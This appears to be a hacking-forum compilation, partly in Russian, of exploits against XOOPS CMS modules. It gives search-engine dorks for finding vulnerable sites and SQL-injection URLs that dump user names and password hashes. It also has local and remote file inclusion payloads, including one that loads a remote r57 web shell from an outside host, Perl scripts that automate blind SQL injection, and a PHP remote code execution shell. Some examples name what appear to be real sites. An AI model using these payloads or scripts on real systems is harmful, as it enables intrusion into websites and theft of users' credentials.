XOOPS Module tutorials (printpage.php) SQL Injection Vulnerability

DORKS 1 : allinurl :"/modules/tutorials/"
DORK 2 : allinurl :"/modules/tutorials/"tid

EXPLOIT 1 :

modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass), 3,4,5/**/from/**/xoops_users/*

EXPLOIT 2 :

modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*

================================================
XOOPS Module My_eGallery 3.04 (gid) SQL Injection Vulnerability

DORKS 1 : allinurl :"modules/my_egallery"

EXPLOIT :

modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from+xoops_users/*


================================================
XOOPS Module Gallery 0.2.2 (gid) Remote SQL Injection Vulnerability

DORKS 1 : allinurl :"modules/gallery"
DORK 2 : allinurl :"modules/gallery"gid

EXPLOIT :

modules/gallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from/**/xoops_users/*


================================================
XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability

DORK 1 : allinurl: "modules/wfdownloads/viewcat.php?cid"
DORK 2 : allinurl: "modules/wfdownloads"
EXPLOIT :

modules/wfdownloads/viewcat.php?cid=999%2F%2A%2A%2Funion%2F%2A%2A%2Fse lect+000,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*where%20pass

================================================
XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerabilit
DORK 1 : allinurl: "modules/glossaires"
EXPLOIT :

modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme
================================================
PS найденные за март 2008

LFI

Vulnerable: XOOPS 2.0.18

Уязвимый скрипт: htdocs/install/index.php

$language = 'english';
if ( !empty($_POST['lang']) ) {
$language = $_POST['lang'];
.
.
.
.



if ( file_exists("./language/".$language."/install.php") ) {
include_once "./language/".$language."/install.php";

POST-переменная "lang" не фильтруется

PoC:

POST /xoops-2.0.18/htdocs/install/index.php HTTP/1.0
Cookie: install_lang=english; lang=russian; PHPSESSID=p113cjpff5dkrkoka01al18kk5; dk_sid=sfa6hlhn75pobg6kqe5m8p30j1
Content-Length: 67
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: localhost
Content-Type: application/x-www-form-urlencoded
Referer: http://localhost/xoops-2.0.18/htdocs/install/index.php

lang=/../../../../../../../../boot.ini%00.html&op=start&submit=Next

URL Redirection

Vulnerable: XOOPS 2.0.18

Уязвимый скрипт: htdocs/user.php?xoops_redirect
POST-переменная "xoops_redirect" не фильтруется

PoC:

http://[server]/[installdir]/htdocs/user.php?xoops_redirect=http://evilsite.com

XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
DORK 1 : allinurl: "modules/dictionary"

DORK 2 : allinurl: "modules/dictionary/print.php?id"


EXPLOIT :

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*

XOOPS Module Dictionary <= 0.94 Remote SQL Injection Vulnerability

##########################################
#
# XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAİL : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#
###########################################
EXPLOIT :

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################

# milw0rm.com [2008-03-17]


milw0rm.com

SQL Injection

Vulnerable: XOOPS Project-Recette(Recipe)2.2

Exploit:

modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*


Dork:

allinurl :\"modules/recipe\"

RFI

Vulnerable: XOOPS Module XFsection

Vuln script: modify.php

PoC:

http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?


Vulnerable: XOOPS Module XT-Conteudo

Vuln script: /admin/spaw/spaw_control.class.php

include $spaw_root.'config/spaw_control.config.php';
include $spaw_root.'class/toolbars.class.php';
include $spaw_root.'class/lang.class.php';


PoC:

http://site/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[shell]?


Vulnerable: XOOPS Module Cjay Content 3

Vuln script: /admin/editor2/spaw_control.class.php

include $spaw_root.'config/spaw_control.config.php';
include $spaw_root.'class/toolbars.class.php';
include $spaw_root.'class/lang.class.php';

Note: Register globals must be ON, and Magic Quotes must be OFF

PoC:

http://site/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[shell ]?

Vulnerable: XOOPS Module icontent 1.0

Exploit:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=windows-1254">
<title>XOOPS Module icontent v.1.0 Remote File Inclusion
Exploit</title>

<script language="JavaScript">

//'================================================= ==============================================
//'[Script Name: XOOPS Module icontent v.1.0
//'[Author : Mahmood_ali
//'[S.Page :
http://mirror.in.th/sourceforge.net/x/xo/xoops/xoops2-mod_icontent.zip
//'================================================= ==============================================

//'[[V.Code]]------------------------------------------------------
//'
//'include $spaw_root.'config/spaw_control.config.php';
//'include $spaw_root.'class/toolbars.class.php';
//'include $spaw_root.'class/lang.class.php';
//'
//'[[V.Code]]---------------------------------------------------------

//# Tryag.Com
//# ...




var path="/modules/icontent/include/wysiwyg/"
var adres="spaw_control.class.php" //File name
var acik ="?spaw_root=" // Line 15
var shell="http://lppm.uns.ac.id/r57.txt?" // R57Shell

function command(){
if (document.rfi.target1.value==""){
alert("Failed..");
return false;
}



rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready
rfi.submit(); // Form Submit
}
</script>

</head>

<body bgcolor="#000000">
<center>

<p><b><font face="Arial" size="2"
color="#FFFFFF">XOOPS Module icontent
v.1.0 Remote File Inclusion Exploit</font></b></p>

<p></p>
<form method="post" target="getting"
name="rfi" onSubmit="command();">
<b><font face="Tahoma" size="1"
color="#FF0000">Target:</font><font
face="Tahoma" size="1"
color="#FFFF00">[http://[target]/[scriptpath]</font><font
color="#00FF00"
size="2" face="Tahoma">
</font><font color="#FF0000"
size="2"> </font></b>
<input type="text" name="target1"
size="20" style="background-color:
#808000"
onmouseover="javascript:this.style.background='#808080';"
onmouseout="javascript:this.style.background='#808000';"></p>
<p><input type="submit" value="Gonder"
name="B1"><input type="reset"
value="Sifirla" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337"
width="633" scrolling="yes"
frameborder="0"></iframe>
</p>

<b><font face="Lucida Handwriting" size="5"
color="#FF0000">Mahmood_ali</font></b><p>
<b><a href="http://tryag.com/cc">
<font face="Lucida Handwriting" size="5"
color="#FFFFFF">TrYaG-Team</font></a></b></p>
</p>
</center>
</body>

</html>


Vulnerable: XOOPS Module tsdisplay4xoops 0.1

PoC:

[Path]/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=Shell



Remote SQL Injection

Vulnerable: XOOPS Module Jobs <= 2.4


#!/usr/bin/perl
#[Script Name: XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL
Injection Exploit
#[Coded by : ajann
#[Author : ajann
#[Contact : :(
#[Dork : "inurl:/modules/jobs/"
#[S.Page : http://www.jlmzone.com/
#[$$ : Free
#[.. : ajann,Turkey


use IO::Socket;
if(@ARGV < 1){
print "
[================================================== ======================
[// XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL Injection Exploit
[// Usage: exploit.pl [target]
[// Example: exploit.pl victim.com
[// Example: exploit.pl victim.com
[// Vuln&Exp : ajann
[================================================== ======================
";
exit();
}
#Local variables
$kapan = "/*";
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/modules/jobs/index.php?pa=jobsview&cid=";

print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);

if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}

if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}

print "User ID (uid): ";
$id = <STDIN>;
chop ($id);

$target =
"-1%20union%20select%203,concat(char(117,115,101,114 ,110,97,109,101,58),uname,char(112,97,115,115,119, 111,114,100,58),pass),1%20from%20xoops_users%20whe re%20uid%20like%20".$id.$kapan;
$target = $host.$dir.$file.$target;

#Writing data to socket
print
"+************************************************* *********************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr
=> "$server", PeerPort => "$port") || die
"\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}

if ($answer =~ /password:(.*?)<\/b>/){
print "+ Password: $1\n";
}

if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n";
print
"+************************************************* *********************+\n";
exit();
}

if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n";
print
"+************************************************* *********************+\n";
exit();
}
}

Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it

#############################################
#Coded By Cr@zy_King http://coderx.org]#
#############################################

use IO::Socket;

if (@ARGV != 3)
{
print "\n-----------------------------------\n";
print "Xoops All Version -Articles- Article.PHP (ID) Blind SQL Injection ExpL0it\n";
print "-----------------------------------\n";
print "\n4ever Cra\n";
print "crazy_kinq[at]hotmail.co.uk\n";
print "http://coderx.org\n";
print "\n-----------------------------------\n";
print "\nKullanim: $0 <server> <path> <uid>\n";
print "Ornek: $0 www.victim.com /path 1\n";
print "\n-----------------------------------\n";
exit ();
}

$server = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort =>
"80");
printf $socket ("GET
%s/modules/articles/article.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/*
HTTP/1.0\nHost: %s\nAccept: */*\nConnection:
close\n\n",
$path,$server,$uid);

while(<$socket>)

{
if (/\>(\w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; }
}

# Cr@zy_King
# http://coderx.org
# crazy_kinq@hotmail.co.uk

Solide Snake, не разу на blind не натыкался.

xoops # Article Module # sql injection


modules/articles/article.php?id={SQL}--

+xoops_users
-uname
-pass

example:

http://www.geo.pu.ru/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(0x3a,uname,0x 3a,pass),8,9,0,1,2,3,4,5,6,7,8,9,0+from+xoops_user s+limit+0,1--

mega exploit :D :

#!usr/bin/perl
use LWP::UserAgent;
print qq(
# xoops article module exploit #
# coded by ph1l1ster #\n\n# Enter site:\n> );
$site = <STDIN>;chomp($site);
print "\n# Enter numbers of users:\n> ";
$users = <STDIN>;chomp($users);
&inj;
sub inj{
print "\nStarting..\n\n";
$limit = 0;
while ($limit <= $users){
$url = "http://".$site."/modules/articles/article.php?id=-9999+union+select+1,2,3,4,5,6,concat(555666,0x3a,u name,0x3a,pass,0x3a,777888),8,9,10,11,12,13,14,15, 16,17,18,19,20+from+xoops_users+limit+".$limit.",1--";
$client = LWP::UserAgent->new( ) or die;
$answer = $client->get($url);
$limit ++;
if ($answer->content =~ /555666:(.*):777888/){
print $1."\n";}}
print "Done!"}

XOOPS modules/easyweb/

SQL-inj

Exploit
-555555+union+select+1,2,3,concat_ws(0x3a,uname,pas s),5+from+xoops_users--

http://ofernio.ru/portal/modules/easyweb/?artid=-5+union+select+1,2,3,concat_ws(0x3a,uname,pass),5+ from+xoops_users--

dOrK: inurl:/modules/easyweb/

XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit

#!/usr/bin/php -q
<?php

/************************************************** **************
* XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit *
* by athos - staker[at]hotmail[dot]it *
* http://xoops.org *
* *
* thanks to s3rg3770 and The:Paradox *
* *
* works with register globals on *
* note: this vuln is a remote php code execution *
* *
* Directory (xoops_lib/modules/protector/) *
* onupdate.php?mydirname=a(){} [PHP CODE] function v *
* oninstall.php?mydirname=a(){} [PHP CODE] function v *
* notification.php?mydirname=a(){} [PHP CODE] function v *
************************************************** **************/

error_reporting(0);

list($cli,$host,$path,$num) = $argv;

if ($argc != 4) {

print "\n+--------------------------------------------------------------+\n";
print "\r| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit |\n";
print "\r+--------------------------------------------------------------+\n";
print "\rby athos - staker[at]hotmail[dot]it / http://xoops.org\n";
print "\rUsage: php xpl.php [host] [path]\n\n";
print "\rhost + localhost\n";
print "\rpath + /XOOPS\n";
exit;
}

exploit();

function exploit() {

global $num;

if ($num > 3) {
die("\n$num isn't a valid option\n");
}
else {
yeat_shell();
}
}


function yeat_shell() {

while (1) {
echo "yeat[php-shell]~$: ";
$exec = stripslashes(trim(fgets(STDIN)));

if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n");
if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n");
if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n");

print data_exec($exec);
}
}


function data_exec($exec) {

global $host,$path,$num;

if ($num == 1) {
$urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}";
}

if ($num == 2) {
$urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}";
}

if ($num == 3) {
$urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}";
}

$exec = urlencode($exec);
$data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1\r\n";
$data .= "Host: {$host}\r\n";
$data .= "User-Agent: Lynx (textmode)\r\n";
$data .= "Connection: close\r\n\r\n";

$html = data_send ($host,$data);

return $html;
}


function data_send ($host,$data) {

if (!$sock = @fsockopen($host,80)) {
die("Connection refused,try again!\n");
} fputs($sock,$data);

while (!feof($sock)) { $html .= fgets($sock); }

fclose($sock);
return $html;
}

(c)milw0rm.com

LFI[Xoops 2.2.6]

Под руку попалась эта версия.
Смотри исходники system/admin.php:

<?php
if (isset($_POST['fct'])) {
$fct = trim($_POST['fct']);
}
if (isset($_GET['fct'])) {
$fct = trim($_GET['fct']);
}
$xoopsOption['pagetype'] = "admin";
include "../../mainfile.php";
if (!$xoopsUser) {
redirect_header(XOOPS_URL."/user.php", 3, _AD_NORIGHT);
}
include XOOPS_ROOT_PATH."/include/cp_functions.php";

include_once XOOPS_ROOT_PATH."/modules/system/constants.php";
$error = false;
if (isset($fct) && $fct != '') {
if (file_exists(XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php")) {

if (file_exists(XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php")) {
include XOOPS_ROOT_PATH."/modules/system/language/".$xoopsConfig['language']."/admin/".$fct.".php";
} elseif (file_exists(XOOPS_ROOT_PATH."/modules/system/language/english/admin/".$fct.".php")) {
...
}
include XOOPS_ROOT_PATH."/modules/system/admin/".$fct."/xoops_version.php";
...

Експлоит:

http://site.com/modules/system/admin.php?fct=../../../../../../../etc/passwd%00